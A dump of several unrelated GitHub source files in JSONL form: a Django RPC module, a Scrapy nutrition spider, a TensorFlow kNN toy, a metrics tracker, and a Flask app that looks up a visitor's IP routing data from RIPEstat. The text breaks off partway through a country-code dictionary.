)\n","repo_name":"toutpt/collective.mdlevent","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"42030679722","text":"from django.forms.models import model_to_dict\nfrom rpc4django import rpcmethod\n\nimport molecule.models as molecule_models\n\n@rpcmethod(name='molecule.ping', signature=[])\ndef ping():\n return 'PONG'\n \n\n@rpcmethod(name='molecule.list', signature=[])\ndef list():\n molecules = molecule_models.Molecule.objects.all()\n x = [model_to_dict(molecule) for molecule in molecules]\n\n return x","repo_name":"rmcl/rcell","sub_path":"rcell-kb/kb/core/molecule/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2822541870","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 27 17:53:25 2021\r\n\r\n@author: Nishith\r\n\"\"\"\r\n\r\nn=input(\"Please enter a number: \")\r\nsum=0\r\nn=eval(n)\r\nfor i in range(1,n+1):\r\n sum=sum+i*i*i\r\nprint(sum)\r\n","repo_name":"Nishith170217/Python-Self-Challenge","sub_path":"Program for cube sum of first n natural numbers.py","file_name":"Program for cube sum of first n natural numbers.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71990774407","text":"import scrapy,re\nfrom bs4 import BeautifulSoup as bs\n\nclass FddbSpider(scrapy.Spider):\n \"\"\"\n Scrapy spider meant to crawl all nutritional information \n about a product from http://fddb.info\n \"\"\"\n name = \"fddb\"\n start_urls = [\n \"http://fddb.info/db/fr/groupes/{}/index.html\".format(group)\n for group in [\n \"epice\", \"boissons\", \"congelateur\", \"fromages\", \n \"garniture\", \"international\", \"legumineuse\", \"mets\", \n \"pomme_de_terre\", \"viande\", \"autre\", \"cereale\", \n \"friterie\", \"fruits\", \"huiles_et_lipides\", \"legumes\", \n \"laitage\", \"poisson\", \"sucreries\"]\n ]\n\n \n def parse(self, response):\n # Parse groups if there are any\n groups_b = response.css('div.leftblock h3:first-child::text').extract_first()\n if groups_b:\n # Follow the \"groups\" links \n groups = response.css('div.leftblock div.standardcontent:first-child table td table td:first-child a::attr(href)').extract()\n for group in groups:\n group_page = response.urljoin(group.strip())\n yield scrapy.Request(group_page, callback=self.parse)\n \n # Parse producers if there are any\n producers_b = response.css('div.leftblock h4.grouppreproducthead::text').extract_first()\n if producers_b:\n nb_child = \"n + 2\" if groups_b else \"n\"\n query = 'div.leftblock > div:nth-child({}) table a::attr(href)'.format(nb_child)\n products = response.css(query).extract()\n for product in products:\n product_page = response.urljoin(product.strip())\n yield scrapy.Request(product_page, callback=self.parse_product)\n \n\n\n def parse_product(self, response):\n nutriments = []\n value_unit_re = r\"^([\\d,]+)\\s(\\w+)$\"\n \n # Extracts all nutriments information\n if response.css(\"div.leftblock div.itemsec2012:first-child h2::text\").extract_first():\n rows = response.css('div.itemsec2012:first-child ~ div > div').extract() \n # Even rows are nutriments' names, odd rows are nutriments' values and units\n i = 0\n while i < len(rows)-1:\n nutriment = {}\n html_name = bs(rows[i], 'html.parser')\n html_value = bs(rows[i+1], 'html.parser')\n i += 2\n\n # Skip \"Water content\"\n name = html_name.span.string\n if \"Water\" in name:\n continue\n \n # Rename nutriments with the names \n # already present in our ElasticSearch (ES) instance\n if name == \"Valeur énergétique\":\n name = \"Énergie\"\n elif name == \"Calorie\":\n name = \"Énergie (kCal)\"\n elif name == \"Lipides\":\n name = \"Matières grasses\"\n elif name == \"Sucre\":\n name = \"Sucres\"\n \n # Sperate values and units\n value, unit = re.match(value_unit_re, html_value.text).groups()\n value = float(value.replace(',', '.'))\n\n if unit == \"kcal\":\n unit = \"kCal\"\n\n nutriment['name'] = name\n nutriment['unit'] = unit\n nutriment['per_day'] = 0\n nutriment['per_portion'] = 0\n nutriment['per_hundred'] = value\n nutriment['rdi'] = 0\n \n nutriments.append(nutriment)\n \n unit = 'ml' if 'ml' in response.css(\"div.leftblock div.itemsec2012:first-child h2::text\").extract_first() else 'g'\n # Output ready to be sent to ES\n yield {\n '_index': \"products\",\n '_type': \"FDDB\",\n '_source': {\n 'name': self.clean_name(response.css(\"h1#fddb-headline1::text\").extract_first()),\n 'unit': unit,\n 'unit_quantity': unit,\n 'unit_portion': 0,\n 'quantity': 100,\n 'nutriments': nutriments\n }\n }\n\n def clean_name(self, name):\n # Removes generic words inside product name\n reg = r\",\\s(\"\\\n \"séché[es]*|\" \\\n \"sèches?|\" \\\n \"secs?|\" \\\n \"cuit[es]*|\" \\\n \"grain[es]*|\" \\\n \"frais|\" \\\n \"fra[iî]ches?|\" \\\n \"cru[es]*|\" \\\n \"en moyenne|\" \\\n \"moyen(ne)?\" \\\n \")$\"\n return re.sub(reg, '', name)\n","repo_name":"zifeo/Food-habits","sub_path":"0-mining/fddb.py","file_name":"fddb.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"41122116181","text":"from rest_framework import serializers\nfrom rest_framework.viewsets import ModelViewSet\nfrom parflow_data_management.scheduler.models.workflow import Workflow\n\nclass WorkflowSerializer(serializers.ModelSerializer):\n class Meta:\n model = Workflow\n fields = (\"id\", \"project\")\n\nclass WorkflowViewSet(ModelViewSet):\n queryset = Workflow.objects.all()\n\n serializer_class = WorkflowSerializer\n","repo_name":"cjh1/parflow_data_management","sub_path":"parflow_data_management/scheduler/rest/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"38046980899","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"使用TensorFlow实现kNN算法\"\"\"\n\n\ngroup1_x1 = np.random.random(100) * 2\ngroup1_x2 = np.random.random(100) * 2\ngroup1_y = np.ones(group1_x1.shape)\ngroup2_x1 = np.random.random(100) * 2 + 1\ngroup2_x2= np.random.random(100) * 2 + 1\ngroup2_y = np.zeros(group2_x1.shape)\n\ntrain_x1 = np.concatenate([np.reshape(group1_x1, [-1, 1]), np.reshape(group1_x2, [-1, 1])], axis=1)\ntrain_x2 = np.concatenate([np.reshape(group2_x1, [-1, 1]), np.reshape(group2_x2, [-1, 1])], axis=1)\ntrain_x = np.concatenate([train_x1, train_x2], axis=0)\ntrain_y = np.concatenate([np.reshape(group1_y, [-1, 1]), np.reshape(group2_y, [-1, 1])], axis=0)\n\n\n\n\ndef kNN():\n input_x = tf.placeholder(tf.float32, [None, 2], name='input_x')\n label_y = tf.placeholder(tf.float32, [None, 1], name='label_y')\n\n test_x = tf.placeholder(tf.float32, [2], name='test_x')\n\n distance = tf.reduce_mean(tf.square(test_x - input_x), axis=1)\n predict = tf.gather(label_y, tf.argmax(distance, axis=0))\n\n return input_x, label_y, test_x, predict\n\ndef eval(test_sample):\n input_x, label_y, test_x, predict = kNN()\n with tf.Session() as sess:\n feed_dict = {input_x:train_x, label_y:train_y, test_x:test_sample}\n predict_label = sess.run(predict, feed_dict)\n print('Predition:{}'.format(predict_label[0]))\n show_figure(test_sample)\n return predict_label\n\ndef show_figure(test_sample):\n plt.scatter(group1_x1, group1_x2, color='blue')\n plt.scatter(group2_x1, group2_x2, color='yellow')\n plt.scatter(test_sample[0], test_sample[1], color='red')\n plt.show()\n\n\n\nif __name__ == '__main__':\n test_sample = np.array([2.2, 2.2])\n eval(test_sample)\n\n","repo_name":"AgFeather/StudyNote","sub_path":"models/TFBasicML/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22864488908","text":"import math\nfrom collections import defaultdict\n\n\nclass MetricsTracker(object):\n \"\"\" Tracking metrics. \"\"\"\n\n def __init__(self):\n self.metrics_val = defaultdict(float) # for one batch\n self.metrics_avg = defaultdict(float) # avg batches\n self.num_samples = 0\n\n def update(self, metrics, num_samples):\n for key, val in metrics.items():\n if val is not None:\n val = float(val) # [val] -> val\n self.metrics_val[key] = val\n avg_val = \\\n (self.metrics_avg.get(key, 0) * self.num_samples + val * num_samples) / \\\n (self.num_samples + num_samples)\n self.metrics_avg[key] = avg_val\n self.num_samples += num_samples\n\n def clear(self):\n self.metrics_val = defaultdict(float)\n self.metrics_avg = defaultdict(float)\n self.num_samples = 0\n\n def items(self):\n return self.metrics_avg.items()\n\n def get(self, name):\n if self.num_samples == 0:\n raise ValueError('There is no data in Metrics.')\n return self.metrics_avg.get(name)\n\n def state_dict(self):\n return {\n 'metrics_val': self.metrics_val,\n 'metrics_avg': self.metrics_avg,\n 'num_samples': self.num_samples,\n }\n\n def load_state_dict(self, state_dict):\n self.metrics_val = state_dict['metrics_val']\n self.metrics_avg = state_dict['metrics_avg']\n self.num_samples = state_dict['num_samples']\n\n def value(self):\n metric_strs = []\n for key, val in self.metrics_val.items():\n metric_str = f'{key.upper()}-{val:.3f}'\n metric_strs.append(metric_str)\n if 'token_nll' in self.metrics_val:\n metric_str = f\"TOKEN_PPL-{math.exp(self.metrics_val['token_nll']):.3f}\"\n metric_strs.append(metric_str)\n metric_strs = ' '.join(metric_strs)\n return metric_strs\n\n def summary(self):\n metric_strs = []\n for key, val in self.metrics_avg.items():\n metric_str = f'{key.upper()}-{val:.3f}'\n metric_strs.append(metric_str)\n if 'token_nll' in self.metrics_avg:\n metric_str = f\"TOKEN_PPL-{math.exp(self.metrics_avg['token_nll']):.3f}\"\n metric_strs.append(metric_str)\n metric_strs = ' '.join(metric_strs)\n return metric_strs\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/trainers/nlp/space/metrics/metrics_tracker.py","file_name":"metrics_tracker.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"10852355774","text":"from asyncio import events\nfrom pytz import country_names\nimport requests\nimport json\nfrom requests import get\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask import request\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\napp = Flask(__name__)\n\nCORS(app)\n\n\n@ app.route('/', methods=['GET'])\ndef get_tasks():\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\n return {'ip': request.environ['REMOTE_ADDR']}\n else:\n return {'ip': request.environ['HTTP_X_FORWARDED_FOR']}\n\n\n@ app.route(\"/ip\")\n# private=socket.gethostbcket.gethos\n# adr=\"185.185.179.8\"\ndef ip_info():\n ip = {}\n adrr = get_tasks()\n adr = adrr['ip']\n\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n sourcevisib = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+adr+\"%2F24\"\n\n responseip = requests.get(sourceip).json()\n visible = requests.get(sourcevisib).json()\n\n prefix = responseip[\"data\"][\"records\"][0][0][\"value\"]\n ip[\"prefix\"] = prefix\n\n rpki = \"https://stat.ripe.net/data/rpki-validation/data.json?resource=38999&prefix=\"+prefix\n pk = requests.get(rpki).json()\n isp = responseip[\"data\"][\"records\"][0][1][\"value\"]\n ip[\"isp\"] = isp\n country = responseip[\"data\"][\"records\"][0][2][\"value\"]\n ip[\"country\"] = country\n ipp = responseip[\"data\"][\"irr_records\"][0][0][\"value\"]\n ip[\"ip\"] = ipp\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n ip[\"asncode\"] = a\n ip[\"asnname\"] = b\n if (any(c.isalpha() for c in b) == False):\n ip[\"asncode\"] = b\n ip[\"asnname\"] = a\n\n try:\n rpk = pk[\"data\"][\"validating_roas\"][\"validity\"]\n ip[\"rpki\"] = rpk\n except:\n ip[\"rpki\"] = \"Not valid\"\n\n ipv4_seeing = visible[\"data\"][\"visibility\"][\"v4\"][\"ris_peers_seeing\"]\n ipv4_total = visible[\"data\"][\"visibility\"][\"v4\"][\"total_ris_peers\"]\n\n if (ipv4_seeing == ipv4_total):\n ip[\"ipv4\"] = 100\n print(\"100% visibility ipv4\")\n else:\n per = (ipv4_seeing*100)/ipv4_total\n ip[\"ipv4\"] = per\n print(str(per)+\"% Visibility ipv4\")\n\n ipv6_seeing = visible[\"data\"][\"visibility\"][\"v6\"][\"ris_peers_seeing\"]\n ipv6_total = visible[\"data\"][\"visibility\"][\"v6\"][\"total_ris_peers\"]\n\n if (ipv6_seeing == ipv6_total):\n ip[\"ipv6\"] = 100\n print(\"100% visibility ipv6\")\n else:\n per = (ipv6_seeing*100)/ipv6_total\n ip[\"ipv6\"] = per\n print(str(per)+\"% Visibility ipv6\")\n\n with open(\"ip.json\", \"w\") as outfile:\n json.dump(ip, outfile)\n\n return ip\n\n\n@ app.route(\"/as\")\ndef asn_info():\n adrr = get_tasks()\n adr = adrr['ip']\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n dictionary = {}\n sous_dictionnaire = {}\n dictionnaire = {}\n # sourceasn=\"https://stat.ripe.net/data/country-resource-list/data.json?resource=LB\"\n # responseasn = requests.get(sourceasn).json()\n # ASN=responseasn[\"data\"][\"resources\"][\"asn\"]\n\n # for asn in ASN:\n source = \"https://stat.ripe.net/data/visibility/data.json?include=peers_seeing&resource=\"+asn\n source2 = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+asn\n source3 = \"https://stat.ripe.net/data/whois/data.json?resource=\"+asn\n source1 = 'https://ihr.iijlab.net/ihr/api/networks/?number='+asn\n\n # nb of prefixes for each autonomous system\n url = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+asn\n response1 = requests.get(url).json()\n nb = response1[\"data\"][\"announced_space\"][\"v4\"][\"prefixes\"] + \\\n response1[\"data\"][\"announced_space\"][\"v6\"][\"prefixes\"]\n sous_dictionnaire[\"Number of prefixes\"] = nb\n sous_dictionnaire[\"v4\"] = response1[\"data\"][\"announced_space\"][\"v4\"][\"prefixes\"]\n sous_dictionnaire[\"v6\"] = response1[\"data\"][\"announced_space\"][\"v6\"][\"prefixes\"]\n\n # list of prefixes for an as\n list_prefixe = \"https://stat.ripe.net/data/announced-prefixes/data.json?resource=\"+asn\n lists = requests.get(list_prefixe).json()\n j = 0\n for i in lists[\"data\"][\"prefixes\"]:\n prefix = i[\"prefix\"]\n print(prefix)\n dictionnaire[j] = prefix\n j = j+1\n sous_dictionnaire[\"List of prefixes\"] = dictionnaire\n ipv4_seeing = 0\n ipv4_total = 0\n ipv6_seeing = 0\n ipv6_total = 0\n response1 = requests.get(source2).json()\n response2 = requests.get(source3).json()\n response3 = requests.get(source1).json()\n\n print(\"Time:\")\n time = response1[\"data\"][\"last_seen\"][\"time\"]\n sous_dictionnaire[\"time\"] = time\n print(time)\n\n name = response2[\"data\"][\"records\"][0][1][\"value\"]\n print(\"ASN name:\"+name)\n print(response1[\"data\"][\"visibility\"])\n sous_dictionnaire[\"name\"] = name\n print(name)\n\n disco = response3[\"results\"][0][\"disco\"]\n print(\"Disconnection:\"+str(disco))\n sous_dictionnaire[\"disconnection\"] = disco\n\n for i in response1:\n ipv4_seeing = response1[\"data\"][\"visibility\"][\"v4\"][\"ris_peers_seeing\"]\n ipv4_total = response1[\"data\"][\"visibility\"][\"v4\"][\"total_ris_peers\"]\n if (ipv4_seeing == ipv4_total):\n sous_dictionnaire[\"ipv4\"] = 100\n print(\"100% visibility ipv4\")\n else:\n per = (ipv4_seeing*100)/ipv4_total\n sous_dictionnaire[\"ipv4\"] = per\n print(str(per)+\"% Visibility ipv4\")\n\n for i in response1:\n ipv6_seeing = response1[\"data\"][\"visibility\"][\"v6\"][\"ris_peers_seeing\"]\n ipv6_total = response1[\"data\"][\"visibility\"][\"v6\"][\"total_ris_peers\"]\n if (ipv6_seeing == ipv6_total):\n sous_dictionnaire[\"ipv6\"] = 100\n print(\"100% visibility ipv6\")\n else:\n per = (ipv6_seeing*100)/ipv6_total\n sous_dictionnaire[\"ipv6\"] = per\n print(str(per)+\"% Visibility ipv6\")\n\n dictionary[asn] = sous_dictionnaire\n with open(\"sample.json\", \"w\") as outfile:\n json.dump(dictionary, outfile, indent=4)\n\n return dictionary\n\n\n# def event():\n# # dict = {}\n# #\n# # previous_date = datetime.datetime.today() - datetime.timedelta(days=1)\n# # times = str(int(round(previous_date.timestamp())))\n# #\n# # curr_date = datetime.datetime.now()\n# # times1 = str(int(round(curr_date.timestamp())))\n# #\n# url = 'https://ioda.caida.org/ioda/data/events?from=' + \\\n# times+'&until='+times1+'&human=true&meta=country/LB'\n# # events = requests.get(url).json()\n# #\n# # start_time = events[\"queryParameters\"][\"from\"]\n# # end_time = events[\"queryParameters\"][\"until\"]\n# #\n# # timestamp = datetime.datetime.fromtimestamp(int(start_time))\n# # start = timestamp.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # timestamp1 = datetime.datetime.fromtimestamp(int(end_time))\n# # end = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # print(\"Events occured:\")\n# # list_events = events[\"data\"][\"events\"]\n# print(list_events)\n# # dict[\"Events\"] = list_events\n# #\n# print(\"Country:\")\n# # place = events[\"queryParameters\"][\"meta\"]\n# print(place)\n# # dict[\"Country\"] = place\n# #\n# # print(\"Start time:\")\n# print(start)\n# # dict[\"Start-time\"] = start\n# # print(\"End time:\")\n# print(end)\n# # dict[\"End-time\"] = end\n# #\n# with open(\"events.json\", \"w\") as outfile:\n# # json.dump(dict, outfile)\n# #\n# #\n# def alert():\n# # dict = {}\n# #\n# # curr_date = datetime.datetime.now()\n# print(curr_date)\n# # timestamp = str(int(round(curr_date.timestamp())))\n# print(timestamp)\n# #\n# url = 'https://ioda.caida.org/ioda/data/alerts?from='+timestamp + \\\n# '&until='+timestamp+'&annotateMeta=true&human=true&meta=country/LB'\n# # alerts = requests.get(url).json()\n# #\n# # start_time = alerts[\"queryParameters\"][\"from\"]\n# # end_time = alerts[\"queryParameters\"][\"until\"]\n# #\n# # timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n# # start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n# # end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# print(\"Alerts:\")\n# # list_alerts = alerts[\"data\"][\"alerts\"]\n# print(list_alerts)\n# # dict[\"Alerts\"] = list_alerts\n# #\n# # print(\"Start time:\")\n# print(start)\n# # dict[\"Start-time\"] = start\n# # print(\"End time:\")\n# print(end)\n# # dict[\"End-time\"] = end\n# #\n# with open(\"alerts.json\", \"w\") as outfile:\n# # json.dump(dict, outfile)\n# #\n# #\n# event()\n# alert()\n@ app.route(\"/history\")\ndef History():\n adrr = get_tasks()\n adr = adrr['ip']\n # adr='94.187.8.0'\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n\n history = {}\n\n sous_dict = {}\n\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\"+asn\n\n hist = requests.get(url).json()\n\n liste = []\n\n pref = responseip[\"data\"][\"records\"][0][0][\"value\"]\n pref = pref[0:(len(pref)-3)]\n\n for p in hist[\"data\"][\"by_origin\"][0][\"prefixes\"]:\n\n liste.append(p[\"prefix\"])\n\n j = 0\n while(j < len(liste)):\n liste[j] = liste[j][0:(len(liste[j])-3)]\n j = j+1\n\n for l in liste:\n\n if (pref == l):\n\n # date = \"2022\"\n\n i = 0\n\n for d in p[\"timelines\"]:\n\n # print(d)\n\n # print(d[\"starttime\"])\n\n if \"2022\" in d[\"starttime\"]:\n\n sous_dict[d[\"starttime\"][0:10]] = d[\"full_peers_seeing\"]\n sous_dict[d[\"endtime\"][0:10]] = d[\"full_peers_seeing\"]\n i = i+1\n\n return sous_dict\n\n\n@ app.route(\"/all\")\ndef All():\n\n adrr = get_tasks()\n adr = adrr['ip']\n # adr='91.232.100.0'\n dictionnaire = {}\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n sous_dict = {}\n\n list_prefixe = \"https://stat.ripe.net/data/announced-prefixes/data.json?resource=\"+asn\n lists = requests.get(list_prefixe).json()\n j = 0\n for i in lists[\"data\"][\"prefixes\"]:\n prefix = i[\"prefix\"]\n dictionnaire[j] = prefix\n j = j+1\n sous_dict = {}\n\n k = 0\n\n while (k < len(dictionnaire)):\n\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\" + \\\n str(dictionnaire[k][0:(len(dictionnaire[k])-3)])\n\n hist = requests.get(url).json()\n\n for p in hist[\"data\"][\"by_origin\"]:\n if (p[\"origin\"] == asn):\n\n for d in p[\"prefixes\"][0][\"timelines\"]:\n # print(d)\n\n # print(d[\"starttime\"])\n\n if \"2022\" in d[\"starttime\"]:\n if (d[\"starttime\"][0:10] in sous_dict.keys()):\n sous_dict[d[\"starttime\"][0:10]] = sous_dict[d[\"starttime\"]\n [0:10]]+d[\"full_peers_seeing\"]\n if (d[\"endtime\"][0:10] in sous_dict.keys()):\n sous_dict[d[\"endtime\"][0:10]] = sous_dict[d[\"endtime\"]\n [0:10]] + d[\"full_peers_seeing\"]\n else:\n sous_dict[d[\"starttime\"][0:10]\n ] = d[\"full_peers_seeing\"]\n sous_dict[d[\"endtime\"][0:10]\n ] = d[\"full_peers_seeing\"]\n\n k = k+1\n for i in sous_dict.keys():\n sous_dict[i] = sous_dict[i]/len(dictionnaire)\n\n return sous_dict\n\n\n@ app.route(\"/pred\")\ndef Pred():\n adrr = get_tasks()\n adr = adrr['ip']\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n url = 'https://stat.ripe.net/data/bgp-update-activity/data.json?endtime=2022-04-11T12%3A00%3A00&hide_empty_samples=false&max_samples=5000&resource=AS' + \\\n str(asn)+'&starttime=2021-04-11T00%3A00%3A00'\n r = requests.get(url)\n json = r.json()\n return json\n\n\n@ app.route(\"/pay\")\ndef pays():\n country_names = {\n \"afghanistan\": \"AF\",\n \"land Islands\": \"AX\",\n \"albania\": \"AL\",\n \"algeria\": \"DZ\",\n \"american Samoa\": \"AS\",\n \"andorrA\": \"AD\",\n \"angola\": \"AO\",\n \"anguilla\": \"AI\",\n \"antarctica\": \"AQ\",\n \"antigua and Barbuda\": \"AG\",\n \"argentina\": \"AR\",\n \"armenia\": \"AM\",\n \"aruba\": \"AW\",\n \"australia\": \"AU\",\n \"austria\": \"AT\",\n \"azerbaijan\": \"AZ\",\n \"bahamas\": \"BS\",\n \"bahrain\": \"BH\",\n \"bangladesh\": \"BD\",\n \"barbados\": \"BB\",\n \"belarus\": \"BY\",\n \"belgium\": \"BE\",\n \"belize\": \"BZ\",\n \"benin\": \"BJ\",\n \"bermuda\": \"BM\",\n \"bhutan\": \"BT\",\n \"bolivia\": \"BO\",\n \"bosnia and herzegovina\": \"BA\",\n \"botswana\": \"BW\",\n \"bouvet island\": \"BV\",\n \"brazil\": \"BR\",\n \"british indian ocean territory\": \"IO\",\n \"brunei darussalam\": \"BN\",\n \"bulgaria\": \"BG\",\n \"burkina faso\": \"BF\",\n \"burundi\": \"BI\",\n \"cambodia\": \"KH\",\n \"cameroon\": \"CM\",\n \"canada\": \"CA\",\n \"cape verde\": \"CV\",\n \"cayman islands\": \"KY\",\n \"central african republic\": \"CF\",\n \"chad\": \"TD\",\n \"chile\": \"CL\",\n \"china\": \"CN\",\n \"christmas island\": \"CX\",\n \"cocos (Keeling) islands\": \"CC\",\n \"colombia\": \"CO\",\n \"comoros\": \"KM\",\n \"congo\": \"CG\",\n \"congo, The Democratic Republic of the\": \"CD\",\n \"cook islands\": \"CK\",\n \"costa rica\": \"CR\",\n \"cote d\\\"ivoire\": \"CI\",\n \"croatia\": \"HR\",\n \"cuba\": \"CU\",\n \"cyprus\": \"CY\",\n \"czech republic\": \"CZ\",\n \"denmark\": \"DK\",\n \"djibouti\": \"DJ\",\n \"dominica\": \"DM\",\n \"dominican republic\": \"DO\",\n \"ecuador\": \"EC\",\n \"egypt\": \"EG\",\n \"el salvador\": \"SV\",\n \"equatorial guinea\": \"GQ\",\n \"eritrea\": \"ER\",\n \"estonia\": \"EE\",\n \"ethiopia\": \"ET\",\n \"falkland islands (malvinas)\": \"FK\",\n \"faroe islands\": \"FO\",\n \"fiji\": \"FJ\",\n \"finland\": \"FI\",\n \"france\": \"FR\",\n \"french guiana\": \"GF\",\n \"french polynesia\": \"PF\",\n \"french southern territories\": \"TF\",\n \"gabon\": \"GA\",\n \"gambia\": \"GM\",\n \"georgia\": \"GE\",\n \"germany\": \"DE\",\n \"ghana\": \"GH\",\n \"gibraltar\": \"GI\",\n \"greece\": \"GR\",\n \"greenland\": \"GL\",\n \"grenada\": \"GD\",\n \"guadeloupe\": \"GP\",\n \"guam\": \"GU\",\n \"guatemala\": \"GT\",\n \"guernsey\": \"GG\",\n \"guinea\": \"GN\",\n \"guinea-bissau\": \"GW\",\n \"guyana\": \"GY\",\n \"haiti\": \"HT\",\n \"heard island and mcdonald islands\": \"HM\",\n \"holy see (vatican city state)\": \"VA\",\n \"honduras\": \"HN\",\n \"hong kong\": \"HK\",\n \"hungary\": \"HU\",\n \"iceland\": \"IS\",\n \"india\": \"IN\",\n \"indonesia\": \"ID\",\n \"iran, islamic republic of\": \"IR\",\n \"iraq\": \"IQ\",\n \"ireland\": \"IE\",\n \"isle of man\": \"IM\",\n \"israel\": \"IL\",\n \"italy\": \"IT\",\n \"jamaica\": \"JM\",\n \"japan\": \"JP\",\n \"jersey\": \"JE\",\n \"jordan\": \"JO\",\n \"kazakhstan\": \"KZ\",\n \"kenya\": \"KE\",\n \"kiribati\": \"KI\",\n \"korea, democratic people\\\"s republic of\": \"KP\",\n \"korea, republic of\": \"KR\",\n \"kuwait\": \"KW\",\n \"kyrgyzstan\": \"KG\",\n \"lao people\\\"s democratic republic\": \"LA\",\n \"latvia\": \"LV\",\n \"lebanon\": \"LB\",\n \"lesotho\": \"LS\",\n \"liberia\": \"LR\",\n \"libyan Arab Jamahiriya\": \"LY\",\n \"liechtenstein\": \"LI\",\n \"lithuania\": \"LT\",\n \"luxembourg\": \"LU\",\n \"macao\": \"MO\",\n \"macedonia, the former yugoslav republic of\": \"MK\",\n \"madagascar\": \"MG\",\n \"malawi\": \"MW\",\n \"malaysia\": \"MY\",\n \"maldives\": \"MV\",\n \"mali\": \"ML\",\n \"malta\": \"MT\",\n \"marshall islands\": \"MH\",\n \"martinique\": \"MQ\",\n \"mauritania\": \"MR\",\n \"mauritius\": \"MU\",\n \"mayotte\": \"YT\",\n \"mexico\": \"MX\",\n \"micronesia, federated states of\": \"FM\",\n \"moldova, republic of\": \"MD\",\n \"monaco\": \"MC\",\n \"mongolia\": \"MN\",\n \"montenegro\": \"ME\",\n \"montserrat\": \"MS\",\n \"morocco\": \"MA\",\n \"mozambique\": \"MZ\",\n \"myanmar\": \"MM\",\n \"namibia\": \"NA\",\n \"nauru\": \"NR\",\n \"nepal\": \"NP\",\n \"netherlands\": \"NL\",\n \"netherlands antilles\": \"AN\",\n \"new caledonia\": \"NC\",\n \"new zealand\": \"NZ\",\n \"nicaragua\": \"NI\",\n \"niger\": \"NE\",\n \"nigeria\": \"NG\",\n \"niue\": \"NU\",\n \"norfolk island\": \"NF\",\n \"northern mariana islands\": \"MP\",\n \"norway\": \"NO\",\n \"oman\": \"OM\",\n \"pakistan\": \"PK\",\n \"palau\": \"PW\",\n \"palestinian territory, occupied\": \"PS\",\n \"panama\": \"PA\",\n \"papua new guinea\": \"PG\",\n \"paraguay\": \"PY\",\n \"peru\": \"PE\",\n \"philippines\": \"PH\",\n \"pitcairn\": \"PN\",\n \"poland\": \"PL\",\n \"portugal\": \"PT\",\n \"puerto rico\": \"PR\",\n \"qatar\": \"QA\",\n \"reunion\": \"RE\",\n \"romania\": \"RO\",\n \"russian federation\": \"RU\",\n \"rwanda\": \"RW\",\n \"saint helena\": \"SH\",\n \"saint kitts and nevis\": \"KN\",\n \"saint lucia\": \"LC\",\n \"saint pierre and miquelon\": \"PM\",\n \"saint vincent and the grenadines\": \"VC\",\n \"samoa\": \"WS\",\n \"san marino\": \"SM\",\n \"sao tome and principe\": \"ST\",\n \"saudi arabia\": \"SA\",\n \"senegal\": \"SN\",\n \"serbia\": 